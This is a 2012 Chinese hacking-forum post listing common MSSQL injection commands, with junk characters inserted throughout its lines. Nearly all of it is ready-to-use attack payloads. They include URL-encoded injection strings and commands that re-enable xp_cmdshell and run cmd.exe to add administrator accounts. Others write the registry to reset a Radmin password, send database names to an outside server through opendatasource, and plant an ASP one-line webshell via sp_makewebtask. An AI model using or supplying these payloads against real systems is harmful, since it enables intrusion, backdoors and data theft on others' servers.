找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1867|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令+ @. q$ ]/ e! F
//看看是什么权限的
6 [! E; {, \) A( |% g4 pand 1=(Select IS_MEMBER('db_owner'))
5 O7 }, ?7 X( E; m/ K+ jAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
4 I5 c: _6 z! ~, [# H
# ?+ m+ X, c3 M: H6 K+ L) ^6 y//检测是否有读取某数据库的权限- z+ g% C9 o" O( m
and 1= (Select HAS_DBACCESS('master'))6 J6 M$ p# n$ c# L- z
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --6 U/ g0 g' y/ @$ d! i) O
0 u+ X) T2 Z8 a* L8 f. K7 y

8 H# _" A& L0 s数字类型7 `7 V' |; ^- Z
and char(124)%2Buser%2Bchar(124)=0' o/ j5 `2 h- B7 \+ Y* K: w; }) L  w
. K5 P+ [: _8 h. o. E  L
字符类型7 H; [4 L1 R, F1 K" d/ k. S( t9 I
' and char(124)%2Buser%2Bchar(124)=0 and ''='
% f- ^1 @$ g" M, _; o/ B
  s& `4 d* P4 H# A! Y9 _搜索类型+ P- c, i4 p8 Q3 ?9 c
' and char(124)%2Buser%2Bchar(124)=0 and '%'='9 Q- W4 |' p3 Q; S% e; {. f

, ]' F2 ~! S4 N! Q8 C爆用户名4 M* F% H: [! Z
and user>0
0 T0 x3 M8 C7 Z1 I% c; ]5 B% R7 g' and user>0 and ''='. M5 d3 s. d9 \, Q2 A% b
$ h1 v& a0 T% r! u( L$ C% s! Q$ l) a
检测是否为SA权限
6 M6 c" t: K: L) V' band 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: L/ j  x6 _! l1 v# \* @And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --% Z) j  m" `- u: z) D. G

& U$ }: S* d2 |检测是不是MSSQL数据库
0 \/ k3 C* k8 Gand exists (select * from sysobjects);-- * t3 q$ [9 ~: }; ^3 @: D3 f; J' Y
  Q2 R' G1 k+ x+ F1 ~( }
检测是否支持多行2 F1 q0 e) O, s7 V1 v0 p  F
;declare @d int;--
5 \- P; C3 M( P+ u- P  U" j
; B1 M9 s# m  u9 v8 f# a% E恢复 xp_cmdshell
5 Z, p* z+ i2 ]3 W7 l* L: o8 r;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 h- d+ b* d4 ?: e
4 N, W) r  X% \  I2 H  K2 t" T
8 b# U: m6 m/ m; ]' q# D' Jselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') - ?1 _3 w( Y' S" ~% l

5 ?+ _* D* Z& V( }$ V$ P//-----------------------
7 d1 C. Q  j5 \' ^% O' M//      执行命令7 C' b5 l: Y5 C) J) C2 f
//-----------------------% H* i( e9 i( b: ~) I" o/ E* H
首先开启沙盘模式:
* @( n! v* v3 N  a! Fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
" I# X: O9 n% K: Y, }; i3 B" k! [) P( h4 u
然后利用jet.oledb执行系统命令
3 d2 O2 Q4 n' N# ~" A* Sselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')) J% A4 ?) l1 x! n3 h' V; q2 b

- S" S: [5 z0 G3 F' T( e执行命令* C. S# {" F6 P( K
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--) y, p+ t) V# ]2 j9 Z- U

" G  l8 R; m4 G+ ?: PEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'- g! f' A/ f. B  ?. |5 N
5 \  U' T; r, h2 t
判断xp_cmdshell扩展存储过程是否存在:
/ S* M. r& U5 m4 l& n0 J0 y+ Uhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')3 r( @/ n4 a$ }$ G
) E9 o# U9 J# @4 v; p
写注册表
8 i7 L  d, P# ]/ H) I! C( xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
6 ?4 _) [* ^* L6 J6 e
. g6 G* E& i( `& a' EREG_SZ
! x5 C( q7 {. w4 u1 J: ]( C  b( S& d" K1 o& f
读注册表2 @! v: S+ l' H5 T+ x0 R
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 a' Z, W9 y- j1 T  ?, \2 P0 N% C8 G7 A# F; K& P. b& ]
读取目录内容
% X$ W2 K5 F* a# b6 _2 |6 O# \% aexec master..xp_dirtree 'c:\winnt\system32\',1,1
4 i& l7 g7 H" @: @  s! [  w3 o6 y/ ]2 @3 n; ~# Q$ q
9 M0 j$ j! h4 T+ ]/ ^# G, p
数据库备份& a% i: d+ z1 K5 K7 M
backup database pubs to disk = 'c:\123.bak'$ w# p, S& ?1 M, J
4 l/ T$ s! s5 k5 x) {# d4 W
//爆出长度
8 m; o% v5 Q' F8 ~! m9 [And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--+ u& z. w9 B" v% N! ~- \2 k

1 D9 X) u( }9 K+ c" D
& f: X3 ~) |; ^* R
# k6 B& r" q* W3 q6 W# a7 f更改sa口令方法:用sql综合利用工具连接后,执行命令:
# ~1 k1 x$ @0 z  J: V; D3 Pexec sp_password NULL,'新密码','sa'
$ t2 P# I" i" m  C# c$ v2 X% M9 a5 R2 h. l( B, m
添加和删除一个SA权限的用户test:# E% K* D4 f. @! \. q
exec master.dbo.sp_addlogin test,ptlove. _- i) o7 b' j, G/ H# Y9 u! |, E
exec master.dbo.sp_addsrvrolemember test,sysadmin
, [' o( ]$ H+ N6 q: T$ V: f/ L/ O( t4 V  l
删除扩展存储过过程xp_cmdshell的语句:
: {; P5 i, E7 r# ~3 x5 D. kexec sp_dropextendedproc 'xp_cmdshell'
' r0 q& u; X1 W; U
% k- X0 {2 Q% `$ L2 k5 K添加扩展存储过过程! ]" f$ @& Y1 o5 d$ j' T
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' - M( r  A' I3 j9 U
GRANT exec On xp_proxiedadata TO public
, R$ t! S0 D6 b# B1 m- o
( K, E4 z  P9 P8 q( t) O+ B
0 s' i: o! `1 l停掉或激活某个服务。
* ~1 y4 r3 T% g0 Q3 s3 h- m, P0 B
% b9 Y; `" O) Wexec master..xp_servicecontrol 'stop','schedule': Z2 L- A6 G4 _  M- S- S1 n8 w1 \/ l
exec master..xp_servicecontrol 'start','schedule'1 D. j0 A% J1 c+ o5 S
( X0 i4 w' T3 A
dbo.xp_subdirs7 W: L+ `# I* W: u. n& A
: }! [* n6 H3 z+ f* h# a3 D0 `
只列某个目录下的子目录。5 x+ i, ^- E# S5 q, f
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 G3 d2 m5 a: ?1 {" Q+ Y$ @1 O% H  j+ g7 S
dbo.xp_makecab
+ K# T0 Y/ \6 V+ x2 w' }% C3 R) h
- J% Q: |. k/ B; ?8 K9 X4 A8 p) c/ M" l将目标多个档案压缩到某个目标档案之内。$ T( {9 D- y) V) [+ j$ n1 D; [
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。6 S2 a5 v) l) H# ~9 D6 Q
! M" Q& P" {$ O" }
dbo.xp_makecab) _6 m1 |5 i; s
'c:\test.cab','mszip',1,
# A0 s. h  F5 K1 n# t- N% Y% a'C:\Inetpub\wwwroot\SQLInject\login.asp',& W7 ^# |% ]( L: ~
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'# t2 o) `( Y9 }3 ]3 A- k% C+ J& o2 V
- f% I: o/ S8 L- Z3 \
xp_terminate_process
( B: t6 O# q+ R. r
; v# t3 K/ K4 T' l9 x0 ^停掉某个执行中的程序,但赋予的参数是 Process ID。
+ _) ?, i4 I6 Q0 h' v) [& J利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID" M4 I7 ]" A# c7 B, V

/ N2 X) V# p2 Axp_terminate_process 2484
- |, r1 x: G9 c  D3 `+ F
7 ~: B# [) E! ^5 B7 v" q6 c. Oxp_unpackcab/ _' A- \; b# l( z( i- F

5 K7 A+ h, y; D5 p解开压缩档。
5 c2 R2 O0 I3 _
6 h( B" H2 C/ K0 V3 v& a5 {$ ]xp_unpackcab 'c:\test.cab','c:\temp',16 E9 w" Z; B' ?
7 U  }4 |; F! }. H4 C

& ]' m* c: `/ k; x某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 U$ b/ K. v, `6 h7 T  w2 Q  A3 U% |4 k9 \  G5 Y1 S
create database lcx;
' b: b; o( U/ I  x+ i) tCreate TABLE ku(name nvarchar(256) null);5 {1 }& d3 E5 L3 c! h
Create TABLE biao(id int NULL,name nvarchar(256) null);
( ]7 Z' W& q; M$ P: {
0 m& s+ I! x. O4 x8 K//得到数据库名
) j% l7 s( z( B8 pinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
2 {4 _: d$ x: R/ P/ K
: E- J* _' y' l, v0 K3 Q0 q7 e9 |" w( h6 n2 l. o1 U+ E
//在Master中创建表,看看权限怎样% k' R$ d8 X( ]1 U5 D
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
2 m3 r2 D' P! C6 H) Q
5 U. {  |* i$ J9 E# @, r5 z用 sp_makewebtask直接在web目录里写入一句话马:: g, x# M( c; P1 O
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--9 ?8 L  f: p: @" Q) q( X. N* [

5 h9 e  \0 X! ]" o4 ~" L//更新表内容
& D/ u1 i: k9 x. H9 k7 D$ i* @Update films SET kind = 'Dramatic' Where id = 123: D* F5 L% T/ M' U) R+ k8 {

* g6 M' c( }0 H! }) G//删除内容) e$ W8 o3 H- L, c. `% U6 b
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表